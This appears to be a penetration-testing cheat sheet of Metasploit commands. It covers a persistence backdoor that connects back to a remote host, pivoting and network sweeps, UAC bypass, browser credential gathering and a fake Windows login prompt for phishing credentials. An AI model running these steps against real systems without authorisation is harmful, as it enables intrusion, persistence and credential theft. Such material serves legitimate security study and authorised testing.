title: Metasploit Framework categories: [cheatsheets]
1) Initialize Database
sh> service postgresql start
sh> msfdb init
2) Check Database Status:
msf> db_status
3) Update Metasploit:
sh> msfupdate
4) Login to Metasploit
msf> setConsoleLogging yes
msf> setSessionLogging yes // for future sessions
msf> spool <FileName> // save logged data into file
msf> save // save settings
1) Encrypt the different meterpreter stages:
msf> set EnableStageEncoding True
2) Autostart a script in a new meterpreter session
msf> set AutoRunScript post/windows/manage/migrate
-> or: there is a PrependMigrate option in some modules available
msf> run persistence -p <PORT> -r <RHOST> -X -U -P <PAYLOAD>
-X: Start on Systemstart
-U: Start on Userlogin
Important:
1) create route into a session for the pivoting
msf> route add <netaddr> <netmask> <sess-id>
msf> route add 10.10.10.10.0 255.255.255.0 1
2) explore routed network
2.a) ping_sweep (doesn't need a route)
msf> use post/multi/gather/ping_sweep
msf> set RHOSTS 10.10.10.1-255
msf> set SESSION 2
msf> run
2.b) arp_sweep
msf> use post/multi/gather/arp_sweep
2.c) portscans
msf> use auxiliary/scanner/portscan/tcp
I) Exploitation
exploit/windows/local/bypassuac // UAC Bypas
exploit/windows/local/trusted_service_path // Checks for unquoted service paths
II) Information Gathering
post/windows/gather/winenum // mp> run winenum (-c: delete logs, -r: download registry, -m: winenum in sep. session)
post/windows/enum_chrome // Get Browserdata from chrome, ff, ie
post/windows/enum_firefox
post/windows/enum_ie
post/windows/gather/phish_windows_credentials // PS Login Field for social engineering
III) Auxiliary
auxiliary/scanner/smb/smb_version
auxiliary/admin/smb/samba_symlink_traversal // follows symlinks (if in config: follow symlinks=yes )